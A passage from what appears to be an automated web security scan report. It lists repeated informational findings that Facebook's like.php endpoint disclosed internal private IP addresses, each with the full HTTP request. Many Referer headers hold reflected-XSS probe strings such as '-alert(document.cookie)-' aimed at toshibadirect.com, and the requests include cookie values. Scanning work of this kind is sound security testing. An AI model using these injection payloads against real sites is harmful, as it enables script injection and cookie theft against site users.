User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.24. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.156.102

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.25. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.175.132

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.26. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.182.113

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.27. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.176.125

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.28. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.124.127

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FBlueNile&layout=standard&show_faces=false&action=like&font=arial&colorscheme=light&width=922&height=24 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.29. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.173.113

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.30. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.241.23

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.31. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.166.130

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.32. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.27.112

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.33. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.169.130

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.34. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.207.73

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfed3aed5%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ffeda8546c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.35. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.173.112

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.36. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.22.104

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.37. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.169.126

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.38. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.190.120

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

21.39. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.128.77

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.40. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.180.109

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

21.41. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.175.118

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.42. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.27.121

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.43. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.226.41

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.44. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.180.107

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.45. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.21.119

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.46. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.167.103

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.47. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.154.110

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.48. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.156.118

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

21.49. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.157.103

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.50. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.160.107

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.51. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

